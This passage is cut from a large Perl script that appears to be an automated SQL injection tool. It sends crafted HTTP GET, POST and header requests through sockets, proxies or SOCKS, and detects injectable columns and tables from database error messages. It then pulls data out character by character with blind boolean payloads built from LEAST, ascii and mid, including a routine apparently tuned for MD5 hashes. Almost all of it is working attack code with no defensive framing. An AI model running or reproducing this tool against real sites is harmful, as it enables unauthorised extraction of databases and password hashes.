9231.              $result = 1;
9232.              blind_t();
9233.              return $result;
9234.         }
9235.    }
9236. }
9237. }
9238. }
9239. sub column_check {
9240.   $result = 0;
9241.   $host = $host5;
9242.   $current = $current10;
9243.   $res = "";
9244. if ($https_flag == 0) {
9245.   if ($socks_check == 0) {
9246.        if ($use_proxy == 0) {
9247.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
9248.                 print $socket "$method $current HTTP/1.$http_protocol\n";
9249.                 print $socket "Host: $host\n";
9250.                 if ($cookie) {
9251.                     print $socket "Cookie: $cookie\n";
9252.                 }
9253.                 print $socket "Accept: */*\n";
9254.                 if ($referer) {
9255.                     print $socket "Http-Referer: $referer\n";
9256.                 }
9257.                 if ($user_agent) {
9258.                     print $socket "User-Agent: $user_agent\n";
9259.                 }
9260.                 print $socket "Pragma: no-cache\n";
9261.                 print $socket "Cache-Control: no-cache\n";
9262.                 print $socket "Connection: close\n\n";
9263.                 $socket->autoflush(1);
9264.                 while (<$socket>) {
9265.                    $res .= $_ while <$socket>;
9266.                    if ($sql_mess_type == 1) {
9267.                        if($res =~ m/$sql_mess/img) {
9268.                           close $socket;
9269.                           $result = 1;
9270.                           return $result;
9271.                        } else {
9272.                           close $socket;
9273.                           return $result;
9274.                        }
9275.                    }
9276.                    if ($sql_mess_type == 0) {
9277.                        if($res =~ m/$sql_mess/img) {
9278.                            return $result;
9279.                        } else {
9280.                            $result = 1;
9281.                            return $result;
9282.                        }
9283.                    }
9284.                 }
9285.                 close $socket;
9286.             }
9287.        } else {
9288.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
9289.                 print $socket "$method $current HTTP/1.$http_protocol\n";
9290.                 print $socket "Host: $host\n";
9291.                 if ($cookie) {
9292.                     print $socket "Cookie: $cookie\n";
9293.                 }
9294.                 print $socket "Accept: */*\n";
9295.                 if ($referer) {
9296.                     print $socket "Http-Referer: $referer\n";
9297.                 }
9298.                 if ($user_agent) {
9299.                     print $socket "User-Agent: $user_agent\n";
9300.                 }
9301.                 print $socket "Pragma: no-cache\n";
9302.                 print $socket "Cache-Control: no-cache\n";
9303.                 print $socket "Connection: close\n\n";
9304.                 $socket->autoflush(1);
9305.                 while (<$socket>) {
9306.                    $res  .= $_ while <$socket>;
9307.                    if ($sql_mess_type == 1) {
9308.                        if($res =~ m/$sql_mess/img) {
9309.                           close $socket;
9310.                           $result = 1;
9311.                           return $result;
9312.                        } else {
9313.                           close $socket;
9314.                           return $result;
9315.                        }
9316.                    }
9317.                    if ($sql_mess_type == 0) {
9318.                        if($res =~ m/$sql_mess/img) {
9319.                            close $socket;
9320.                            return $result;
9321.                        } else {
9322.                            close $socket;
9323.                            $result = 1;
9324.                            return $result;
9325.                        }
9326.                    }
9327.                 }
9328.                 close $socket;
9329.             }
9330.       }
9331.    } else {
9332.       $check_url = $current;
9333.       $check_host = $host;
9334.     if ($cookie) {
9335.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
9336.            . "Host: $check_host\r\n"
9337.            . "Cookie: $cookie\r\n"
9338.            . "Referer: " . $referer . "\r\n"
9339.            . "Accept: */*\r\n"
9340.            . "User-Agent: $user_agent\r\n"
9341.            . "Connection: close\r\n\r\n";
9342.     } else {
9343.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
9344.            . "Host: $check_host\r\n"
9345.            . "Referer: " . $referer . "\r\n"
9346.            . "Accept: */*\r\n"
9347.            . "User-Agent: $user_agent\r\n"
9348.            . "Connection: close\r\n\r\n";
9349.     }
9350.      $res = socks_get();
9351.      if ($sql_mess_type == 1) {
9352.          if($res =~ m/$sql_mess/img) {
9353.               $result = 1;
9354.               return $result;
9355.          } else {
9356.               return $result;
9357.          }
9358.      }
9359.      if ($sql_mess_type == 0) {
9360.          if($res =~ m/$sql_mess/img) {
9361.               return $result;
9362.          } else {
9363.               $result = 1;
9364.               return $result;
9365.          }
9366.      }
9367.   }
9368. } else {
9369.    $res = req($host, $current, $method, 0, $ck1);
9370.    if ($sql_mess_type == 1) {
9371.          if($res =~ m/$sql_mess/img) {
9372.               $result = 1;
9373.               return $result;
9374.          } else {
9375.               return $result;
9376.          }
9377.      }
9378.      if ($sql_mess_type == 0) {
9379.          if($res =~ m/$sql_mess/img) {
9380.               return $result;
9381.          } else {
9382.               $result = 1;
9383.               return $result;
9384.          }
9385.      }
9386. }
9387. }
9388. sub a_column_check {
9389.   $result = 0;
9390.   $current = $a_current;
9391.   $host = $host10;
9392.   $global_error = $current_error;
9393.   $res = "";
9394. if ($https_flag == 0) {
9395.   if ($socks_check == 0) {
9396.        if ($use_proxy == 0) {
9397.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
9398.                 print $socket "$method $current HTTP/1.$http_protocol\n";
9399.                 print $socket "Host: $host\n";
9400.                 if ($cookie) {
9401.                     print $socket "Cookie: $cookie\n";
9402.                 }
9403.                 print $socket "Accept: */*\n";
9404.                 if ($referer) {
9405.                     print $socket "Http-Referer: $referer\n";
9406.                 }
9407.                 if ($user_agent) {
9408.                     print $socket "User-Agent: $user_agent\n";
9409.                 }
9410.                 print $socket "Pragma: no-cache\n";
9411.                 print $socket "Cache-Control: no-cache\n";
9412.                 print $socket "Connection: close\n\n";
9413.                 $socket->autoflush(1);
9414.                 while (<$socket>) {
9415.                    $res .= $_ while <$socket>;
9416.                    if($res =~ m/$global_error/imgs) {
9417.                           close $socket;
9418.                           $result = 1;
9419.                           return $result;
9420.                    } else {
9421.                           close $socket;
9422.                           return $result;
9423.                    }
9424.                 }
9425.                 close $socket;
9426.             }
9427.        } else {
9428.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
9429.                 print $socket "$method $current HTTP/1.$http_protocol\n";
9430.                 print $socket "Host: $host\n";
9431.                 if ($cookie) {
9432.                     print $socket "Cookie: $cookie\n";
9433.                 }
9434.                 print $socket "Accept: */*\n";
9435.                 if ($referer) {
9436.                     print $socket "Http-Referer: $referer\n";
9437.                 }
9438.                 if ($user_agent) {
9439.                     print $socket "User-Agent: $user_agent\n";
9440.                 }
9441.                 print $socket "Pragma: no-cache\n";
9442.                 print $socket "Cache-Control: no-cache\n";
9443.                 print $socket "Connection: close\n\n";
9444.                 $socket->autoflush(1);
9445.                 while (<$socket>) {
9446.                    $res .= $_ while <$socket>;
9447.                    if($res =~ m/$global_error/imgs) {
9448.                           close $socket;
9449.                           $result = 1;
9450.                           return $result;
9451.                    } else {
9452.                           close $socket;
9453.                           return $result;
9454.                    }
9455.                 }
9456.                 close $socket;
9457.             }
9458.       }
9459.    } else {
9460.       $check_url = $current;
9461.       $check_host = $host;
9462.     if ($cookie) {
9463.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
9464.            . "Host: $check_host\r\n"
9465.            . "Cookie: $cookie\r\n"
9466.            . "Referer: " . $referer . "\r\n"
9467.            . "Accept: */*\r\n"
9468.            . "User-Agent: $user_agent\r\n"
9469.            . "Connection: close\r\n\r\n";
9470.     } else {
9471.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
9472.            . "Host: $check_host\r\n"
9473.            . "Referer: " . $referer . "\r\n"
9474.            . "Accept: */*\r\n"
9475.            . "User-Agent: $user_agent\r\n"
9476.            . "Connection: close\r\n\r\n";
9477.     }
9478.      $res = socks_get();
9479.      if($res =~ m/$global_error/imgs) {
9480.           $result = 1;
9481.           return $result;
9482.      } else {
9483.           return $result;
9484.      }
9485.   }
9486. } else {
9487.    $res = req($host, $current, $method, 0, $ck1);
9488.    if($res =~ m/$global_error/imgs) {
9489.           $result = 1;
9490.           return $result;
9491.    } else {
9492.           return $result;
9493.    }
9494. }
9495. }
9496. sub a_table_check {
9497.   $result = 0;
9498.   $current = $a_current;
9499.   $host = $host10;
9500.   $global_error = $current_error;
9501.   $res = "";
9502. if ($https_flag == 0) {
9503.   if ($socks_check == 0) {
9504.        if ($use_proxy == 0) {
9505.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
9506.                 print $socket "$method $current HTTP/1.$http_protocol\n";
9507.                 print $socket "Host: $host\n";
9508.                 if ($cookie) {
9509.                     print $socket "Cookie: $cookie\n";
9510.                 }
9511.                 print $socket "Accept: */*\n";
9512.                 if ($referer) {
9513.                     print $socket "Http-Referer: $referer\n";
9514.                 }
9515.                 if ($user_agent) {
9516.                     print $socket "User-Agent: $user_agent\n";
9517.                 }
9518.                 print $socket "Pragma: no-cache\n";
9519.                 print $socket "Cache-Control: no-cache\n";
9520.                 print $socket "Connection: close\n\n";
9521.                 $socket->autoflush(1);
9522.                 while (<$socket>) {
9523.                    $res .= $_ while <$socket>;
9524.                    if($res =~ m/$global_error/imgs || $res =~ m/Syntax error/imgs || $res =~ m/Could not find/imgs || $res =~ m/cannot find the input table/imgs || $res =~ m/Too few parameters/imgs)  {
9525.                           close $socket;
9526.                           return $result;
9527.                    } else {
9528.                           close $socket;
9529.                           $result = 1;
9530.                           return $result;
9531.                    }
9532.                 }
9533.                 close $socket;
9534.             }
9535.        } else {
9536.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
9537.                 print $socket "$method $current HTTP/1.$http_protocol\n";
9538.                 print $socket "Host: $host\n";
9539.                 if ($cookie) {
9540.                     print $socket "Cookie: $cookie\n";
9541.                 }
9542.                 print $socket "Accept: */*\n";
9543.                 if ($referer) {
9544.                     print $socket "Http-Referer: $referer\n";
9545.                 }
9546.                 if ($user_agent) {
9547.                     print $socket "User-Agent: $user_agent\n";
9548.                 }
9549.                 print $socket "Pragma: no-cache\n";
9550.                 print $socket "Cache-Control: no-cache\n";
9551.                 print $socket "Connection: close\n\n";
9552.                 $socket->autoflush(1);
9553.                 while (<$socket>) {
9554.                    $res .= $_ while <$socket>;
9555.                    if($res =~ m/$global_error/imgs || $res =~ m/Syntax error/imgs || $res =~ m/Could not find/imgs || $res =~ m/cannot find the input table/imgs || $res =~ m/Too few parameters/imgs)  {
9556.                           close $socket;
9557.                           return $result;
9558.                    } else {
9559.                           close $socket;
9560.                           $result = 1;
9561.                           return $result;
9562.                    }
9563.                 }
9564.                 close $socket;
9565.             }
9566.       }
9567.   } else {
9568.       $check_url = $current;
9569.       $check_host = $host;
9570.     if ($cookie) {
9571.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
9572.            . "Host: $check_host\r\n"
9573.            . "Cookie: $cookie\r\n"
9574.            . "Referer: " . $referer . "\r\n"
9575.            . "Accept: */*\r\n"
9576.            . "User-Agent: $user_agent\r\n"
9577.            . "Connection: close\r\n\r\n";
9578.     } else {
9579.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
9580.            . "Host: $check_host\r\n"
9581.            . "Referer: " . $referer . "\r\n"
9582.            . "Accept: */*\r\n"
9583.            . "User-Agent: $user_agent\r\n"
9584.            . "Connection: close\r\n\r\n";
9585.     }
9586.      $res = socks_get();
9587.      if($res =~ m/$global_error/img || $res =~ m/Syntax error/imgs || $res =~ m/Could not find/imgs || $res =~ m/cannot find the input table/imgs || $res =~ m/Too few parameters/imgs)  {
9588.          return $result;
9589.      } else {
9590.          $result = 1;
9591.          return $result;
9592.      }
9593.   }
9594. } else {
9595.    $res = req($host, $current, $method, 0, $ck1);
9596.    if($res =~ m/$global_error/imgs || $res =~ m/Syntax error/imgs || $res =~ m/Could not find/imgs || $res =~ m/cannot find the input table/imgs || $res =~ m/Too few parameters/imgs)  {
9597.          return $result;
9598.    } else {
9599.          $result = 1;
9600.          return $result;
9601.    }
9602. }
9603. }
9604. sub len_check {
9605.     $len_len = 1;
9606.     $flag = 1;
9607.       if($sql_flag == 0) {$bbbl_url =  $bl_url}
9608.         if($sql_flag == 1) {$bbbl_url =  $sql_post}
9609.         if($sql_flag == 2) {$bbbl_url =  $sql_header}
9610.     while($flag<4) {
9611.          #$bl_query = $bbbl_url . $bl_plus . "and" . $bl_plus . "length(length(" . $bl_current . "))>" . $len_len . $bl_filtr;
9612.          $bl_query = $bbbl_url . $bl_plus . "and(LEAST(length(length(" . $bl_current . ")),$len_len)=" . $len_len . ")" . $bl_filtr;
9613.          $current = $bl_query;
9614.          if($sql_flag == 0) {$chek_len = wr_check()}
9615.          if($sql_flag == 1) {$chek_len = wr_check_POST()}
9616.          if($sql_flag == 2) {$chek_len = wr_check_HEADER()}
9617.          $len_len++;
9618.          $flag++;
9619.          if ($chek_len == 0) {
9620.              $len_len--;
9621.              $flag = 4;
9622.          }
9623.     }
9624.     $len = '';
9625.     $i = 1;
9626.     while ($i <= $len_len) {
9627.          #$bl_query = $bbbl_url . $bl_plus . "and" . $bl_plus . "mid(length(" . $bl_current . ")," .$i. ",1)<5". $bl_filtr;
9628.          $bl_query = $bbbl_url . $bl_plus . "and(GREATEST(mid(length(" . $bl_current . ")," .$i. ",1),5)=5)". $bl_filtr;
9629.          if($sql_flag == 0) {$chek_len1 = wr_check()}
9630.          if($sql_flag == 1) {$chek_len1 = wr_check_POST()}
9631.          if($sql_flag == 2) {$chek_len1 = wr_check_HEADER()}
9632.          if($chek_len1 == 1) {
9633.                   $i3 = 0;
9634.               while ($i3 < 5) {
9635.            $bl_query = $bbbl_url . $bl_plus . "and" . $bl_plus . "mid(length(" . $bl_current . ")," .$i. ",1)=" . $i3 . $bl_filtr;
9636.                    if($sql_flag == 0) {$chek_len2 = wr_check()}
9637.                    if($sql_flag == 1) {$chek_len2 = wr_check_POST()}
9638.                    if($sql_flag == 2) {$chek_len2 = wr_check_HEADER()}
9639.                    if($chek_len2 == 1) {
9640.                         $len .= $i3;
9641.                         break;
9642.                    }
9643.                   $i3++;
9644.               }
9645.             } else {
9646.                  $i3 = 5;
9647.                  while ($i3 <= 9) {
9648.                     $bl_query = $bbbl_url . $bl_plus . "and(mid(length(" . $bl_current . ")," .$i. ",1)=" . $i3 . ")" . $bl_filtr;
9649.                             if($sql_flag == 0) {$chek_len3 = wr_check()}
9650.                             if($sql_flag == 1) {$chek_len3 = wr_check_POST()}
9651.                             if($sql_flag == 2) {$chek_len3 = wr_check_HEADER()}
9652.                             if($chek_len3 == 1) {
9653.                                $len .= $i3;
9654.                                break;
9655.                             }
9656.                     $i3++;
9657.                          }
9658.           }
9659.     $i++;
9660.     }
9661.     return ($len/10);
9662. }
9663. sub len_check1 {
9664.     $len_len = 0;
9665.     $flag = 1;
9666.        if($sql_flag == 0) {$bbbl_url =  $bl_url}
9667.         if($sql_flag == 1) {$bbbl_url =  $sql_post}
9668.         if($sql_flag == 2) {$bbbl_url =  $sql_header}
9669.     while($flag<4) {
9670.          #$bl_query = $bbbl_url . $bl_plus . "length(length(" . $bl_current . "))>" . $len_len . $bl_filtr;
9671.          $bl_query = $bbbl_url . $bl_plus . "(LEAST(length(length(" . $bl_current . ")),$len_len)=".$len_len . ")" . $bl_filtr; #- WORK
9672.          $current = $bl_query;
9673.          if($sql_flag == 0) {$chek_len = wr_check()}
9674.          if($sql_flag == 1) {$chek_len = wr_check_POST()}
9675.          if($sql_flag == 2) {$chek_len = wr_check_HEADER()}
9676.          $len_len++;
9677.          $flag++;
9678.          if ($chek_len == 0) {
9679.              $len_len--;
9680.              $flag = 4;
9681.          }
9682.     }
9683.     $len = '';
9684.     $i = 1;
9685.     while ($i <= $len_len) {
9686.          $bl_query = $bbbl_url . $bl_plus . "(GREATEST(mid(length(" . $bl_current . ")," .$i. ",1),5)=5)" .$bl_filtr;
9687.          if($sql_flag == 0) {$chek_len1 = wr_check()}
9688.          if($sql_flag == 1) {$chek_len1 = wr_check_POST()}
9689.          if($sql_flag == 2) {$chek_len1 = wr_check_HEADER()}
9690.          if($chek_len1 == 1) {
9691.                   $i3 = 0;
9692.               while ($i3 < 5) {
9693.            $bl_query = $bbbl_url . $bl_plus . "(mid(length(" . $bl_current . ")," .$i. ",1)=" . $i3 . ")" . $bl_filtr;
9694.                    if($sql_flag == 0) {$chek_len2 = wr_check()}
9695.                    if($sql_flag == 1) {$chek_len2 = wr_check_POST()}
9696.                    if($sql_flag == 2) {$chek_len2 = wr_check_HEADER()}
9697.                    if($chek_len2 == 1) {
9698.                         $len .= $i3;
9699.                         break;
9700.                    }
9701.                   $i3++;
9702.               }
9703.             } else {
9704.                  $i3 = 5;
9705.                  while ($i3 <= 9) {
9706.                     $bl_query = $bbbl_url . $bl_plus . "(mid(length(" . $bl_current . ")," .$i. ",1)=" . $i3 . ")" . $bl_filtr;
9707.                             if($sql_flag == 0) {$chek_len3 = wr_check()}
9708.                             if($sql_flag == 1) {$chek_len3 = wr_check_POST()}
9709.                             if($sql_flag == 2) {$chek_len3 = wr_check_HEADER()}
9710.                             if($chek_len3 == 1) {
9711.                                $len .= $i3;
9712.                                break;
9713.                             }
9714.                     $i3++;
9715.                          }
9716.           }
9717.     $i++;
9718.     }
9719.     return ($len/10);
9720. }
9721. sub get_res {
9722.    $max = 255;
9723.    $min = 0;
9724.    $srd = 127;
9725.        if($sql_flag == 0) {$bbbl_url =  $bl_url}
9726.         if($sql_flag == 1) {$bbbl_url =  $sql_post}
9727.         if($sql_flag == 2) {$bbbl_url =  $sql_header}
9728.    while (($max - $min)> 1) {
9729.           $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$srd)=" . $srd .  ")" . $bl_filtr;
9730.         if($sql_flag == 0) {$chek_len4 = wr_check()}
9731.         if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
9732.         if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
9733.         if($chek_len4 == 1) {
9734.               $min = $srd + 1;
9735.           } else {
9736.               $max = $srd;
9737.           }
9738.           $srd  = int(($max + $min)/2);
9739.    }
9740.    $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min . ")" . $bl_filtr;
9741.         if($sql_flag == 0) {$chek_len5 = wr_check()}
9742.         if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
9743.         if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
9744.    if($chek_len5 == 1) {
9745.         return chr(($max-1));
9746.    } else {
9747.         return chr(($min-1));
9748.    }
9749. }
9750. sub get_res1 {
9751.    $max = 255;
9752.    $min = 0;
9753.    $srd = 127;
9754.        if($sql_flag == 0) {$bbbl_url =  $bl_url}
9755.         if($sql_flag == 1) {$bbbl_url =  $sql_post}
9756.         if($sql_flag == 2) {$bbbl_url =  $sql_header}
9757.    while (($max - $min)> 1) {
9758.           $bl_query = $bbbl_url . $bl_plus . "(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$srd)=" . $srd . ")" . $bl_filtr;
9759.         if($sql_flag == 0) {$chek_len4 = wr_check()}
9760.         if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
9761.         if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
9762.         if($chek_len4 == 1) {
9763.               $min = $srd + 1;
9764.           } else {
9765.               $max = $srd;
9766.           }
9767.           $srd  = int(($max + $min)/2);
9768.    }
9769.    $bl_query = $bbbl_url . $bl_plus . "(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min . ")" . $bl_filtr;
9770.         if($sql_flag == 0) {$chek_len5 = wr_check()}
9771.         if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
9772.         if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
9773.    if($chek_len5 == 1) {
9774.         return chr(($max-1));
9775.    } else {
9776.         return chr(($min-1));
9777.    }
9778. }
9779. sub get_res_normal {
9780.    $max = 255;
9781.    $min = 0;
9782.    $srd = 127;
9783.           if($sql_flag == 0) {$bbbl_url =  $bl_url}
9784.         if($sql_flag == 1) {$bbbl_url =  $sql_post}
9785.         if($sql_flag == 2) {$bbbl_url =  $sql_header}
9786.    while (($max - $min)> 1) {
9787.         $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$srd)=" . $srd .  ")" . $bl_filtr;
9788.         if($sql_flag == 0) {$chek_len4 = wr_check()}
9789.         if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
9790.         if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
9791.         if($chek_len4 == 1) {
9792.               $min = $srd + 1;
9793.           } else {
9794.               $max = $srd;
9795.           }
9796.           $srd  = int(($max + $min)/2);
9797.    }
9798.    $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min .  ")" . $bl_filtr;
9799.         if($sql_flag == 0) {$chek_len5 = wr_check()}
9800.         if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
9801.         if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
9802.    if($chek_len5 == 1) {
9803.         return ($max-1);
9804.    } else {
9805.         return ($min-1);
9806.    }
9807. }
9808. sub get_res_normal1 {
9809.    $max = 255;
9810.    $min = 0;
9811.    $srd = 127;
9812.         if($sql_flag == 0) {$bbbl_url =  $bl_url}
9813.         if($sql_flag == 1) {$bbbl_url =  $sql_post}
9814.         if($sql_flag == 2) {$bbbl_url =  $sql_header}
9815.    while (($max - $min)> 1) {
9816.           $bl_query = $bbbl_url . $bl_plus . "(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),".$srd.")=" . $srd .  ")" . $bl_filtr;
9817.         if($sql_flag == 0) {$chek_len4 = wr_check()}
9818.         if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
9819.         if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
9820.         if($chek_len4 == 1) {
9821.               $min = $srd + 1;
9822.           } else {
9823.               $max = $srd;
9824.           }
9825.           $srd  = int(($max + $min)/2);
9826.    }
9827.    $bl_query = $bbbl_url . $bl_plus . "(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min . ")" . $bl_filtr;
9828.         if($sql_flag == 0) {$chek_len5 = wr_check()}
9829.         if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
9830.         if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
9831.    if($chek_len5 == 1) {
9832.         return ($max-1);
9833.    } else {
9834.         return ($min-1);
9835.    }
9836. }
9837. sub md5_turbo {
9838.    $max = 108;
9839.    $min = 48;
9840.    $srd = 75;
9841.         if($sql_flag == 0) {$bbbl_url =  $bl_url}
9842.         if($sql_flag == 1) {$bbbl_url =  $sql_post}
9843.         if($sql_flag == 2) {$bbbl_url =  $sql_header}
9844.    while (($max - $min)> 1) {
9845.           $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$srd)=" . $srd . ")" . $bl_filtr;
9846.         if($sql_flag == 0) {$chek_len4 = wr_check()}
9847.         if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
9848.         if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
9849.         if($chek_len4 == 1) {
9850.               $min = $srd + 1;
9851.           } else {
9852.               $max = $srd;
9853.           }
9854.           $srd  = int(($max + $min)/2);
9855.    }
9856.    $bl_query = $bbbl_url . $bl_plus . "and(LEAST(ascii(mid(" . $bl_current . "," .$ii. ",1)),$min)=" . $min . ")" . $bl_filtr;
9857.         if($sql_flag == 0) {$chek_len5 = wr_check()}
9858.         if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
9859.         if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
9860.    if($chek_len5 == 1) {
9861.         return chr(($max-1));
9862.    } else {
9863.         return chr(($min-1));
9864.    }
9865. }
9866. sub get_res_count {
9867.    $max = 9;
9868.    $min = 0;
9869.    $srd = 4;
9870.         if($sql_flag == 0) {$bbbl_url =  $bl_url}
9871.         if($sql_flag == 1) {$bbbl_url =  $sql_post}
9872.         if($sql_flag == 2) {$bbbl_url =  $sql_header}
9873.    while (($max - $min)> 1) {
9874.           $bl_query = $bbbl_url . $bl_plus . "and(LEAST(mid(" . $bl_current . "," .$ii. ",1),$srd)=" . $srd . ")" . $bl_filtr;
9875.         if($sql_flag == 0) {$chek_len4 = wr_check()}
9876.  
9877.         if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
9878.         if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
9879.         if($chek_len4 == 1) {
9880.               $min = $srd + 1;
9881.           } else {
9882.               $max = $srd;
9883.           }
9884.           $srd  = int(($max + $min)/2);
9885.    }
9886.    $bl_query = $bbbl_url . $bl_plus . "and(LEAST(mid(" . $bl_current . "," .$ii. ",1),$min)=" . $min  . ")" . $bl_filtr;
9887.         if($sql_flag == 0) {$chek_len5 = wr_check()}
9888.         if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
9889.         if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
9890.    if($chek_len5 == 1) {
9891.         return ($max-1);
9892.    } else {
9893.         return ($min-1);
9894.    }
9895. }
9896. sub get_res_count1 {
9897.    $max = 9;
9898.    $min = 0;
9899.    $srd = 4;
9900.         if($sql_flag == 0) {$bbbl_url =  $bl_url}
9901.         if($sql_flag == 1) {$bbbl_url =  $sql_post}
9902.         if($sql_flag == 2) {$bbbl_url =  $sql_header}
9903.    while (($max - $min)> 1) {
9904.           $bl_query = $bbbl_url . $bl_plus . "(LEAST(mid(" . $bl_current . "," .$ii. ",1),$srd)=" . $srd  . ")" . $bl_filtr;
9905.         if($sql_flag == 0) {$chek_len4 = wr_check()}
9906.         if($sql_flag == 1) {$chek_len4 = wr_check_POST()}
9907.         if($sql_flag == 2) {$chek_len4 = wr_check_HEADER()}
9908.         if($chek_len4 == 1) {
9909.               $min = $srd + 1;
9910.           } else {
9911.               $max = $srd;
9912.           }
9913.           $srd  = int(($max + $min)/2);
9914.    }
9915.    $bl_query = $bbbl_url . $bl_plus . "(LEAST(mid(" . $bl_current . "," .$ii. ",1),$min)=" . $min . ")" . $bl_filtr;
9916.         if($sql_flag == 0) {$chek_len5 = wr_check()}
9917.         if($sql_flag == 1) {$chek_len5 = wr_check_POST()}
9918.         if($sql_flag == 2) {$chek_len5 = wr_check_HEADER()}
9919.    if($chek_len5 == 1) {
9920.         return ($max-1);
9921.    } else {
9922.         return ($min-1);
9923.    }
9924. }
9925.  
9926. sub scan_url_POST {
9927. $res = "";
9928. if($current && $sql_post){
9929. if ($test_mode==1) {
9930.     print "===============================================\n";
9931.     print "URL: $current\n";
9932.     print "POST query: $sql_post\n";
9933.     print "===============================================\n";
9934. }
9935. $lsd=length $sql_post;
9936. if ($get_method == 0) {
9937. if ($https_flag == 0) {
9938.    if ($socks_check == 0) {
9939.        if ($use_proxy == 0) {
9940.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
9941.                 print $socket "POST $current HTTP/1.$http_protocol\n";
9942.                 print $socket "Host: $host\n";
9943.                 if ($cookie) {
9944.                     print $socket "Cookie: $cookie\n";
9945.                 }
9946.                 print $socket "Accept: */*\n";
9947.                 if ($referer) {
9948.                     print $socket "Http-Referer: $referer\n";
9949.                 }
9950.                 if ($user_agent) {
9951.                     print $socket "User-Agent: $user_agent\n";
9952.                 }
9953.                 print $socket "Pragma: no-cache\n";
9954.                 print $socket "Cache-Control: no-cache\n";
9955.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
9956.                 print $socket "Content-Length: $lsd\n";
9957.                 print $socket "Connection: close\n\n";
9958.                 print $socket $sql_post ."\n";
9959.                 $socket->autoflush(1);
9960.                 while (<$socket>) {
9961.                    $res .= $_ while <$socket>;
9962.                 }
9963.                 close $socket;
9964.                 if ($test_mode==1) {print $res}
9965.             }
9966.        } else {
9967.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
9968.                 print $socket "POST $current HTTP/1.$http_protocol\n";
9969.                 print $socket "Host: $host\n";
9970.                 if ($cookie) {
9971.                     print $socket "Cookie: $cookie\n";
9972.                 }
9973.                 print $socket "Accept: */*\n";
9974.                 if ($referer) {
9975.                     print $socket "Http-Referer: $referer\n";
9976.                 }
9977.                 if ($user_agent) {
9978.                     print $socket "User-Agent: $user_agent\n";
9979.                 }
9980.                 print $socket "Pragma: no-cache\n";
9981.                 print $socket "Cache-Control: no-cache\n";
9982.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
9983.                 print $socket "Content-Length: $lsd\n";
9984.                 print $socket "Connection: close\n\n";
9985.                 print $socket $sql_post ."\n";
9986.                 $socket->autoflush(1);
9987.                 while (<$socket>) {
9988.                    $res  .= $_ while <$socket>;
9989.                 }
9990.                 close $socket;
9991.                 if ($test_mode==1) {print $res}
9992.             }
9993.       }
9994.    } else {
9995.       $check_url = $current;
9996.       $check_host = $host;
9997.     if ($cookie) {
9998.       our $query = "POST $check_url HTTP/1.$http_protocol\r\n"
9999.            . "Host: $check_host\r\n"
10000.            . "Cookie: $cookie\r\n"
10001.            . "Referer: " . $referer . "\r\n"
10002.            . "Accept: */*\r\n"
10003.            . "User-Agent: $user_agent\r\n"
10004.            . "Content-Type: application/x-www-form-urlencoded\n"
10005.            . "Content-Length: $lsd\n"
10006.            . "Connection: close\n\n"
10007.            .  $sql_post ."\n";
10008.     } else {
10009.       our $query = "POST $check_url HTTP/1.$http_protocol\r\n"
10010.            . "Host: $check_host\r\n"
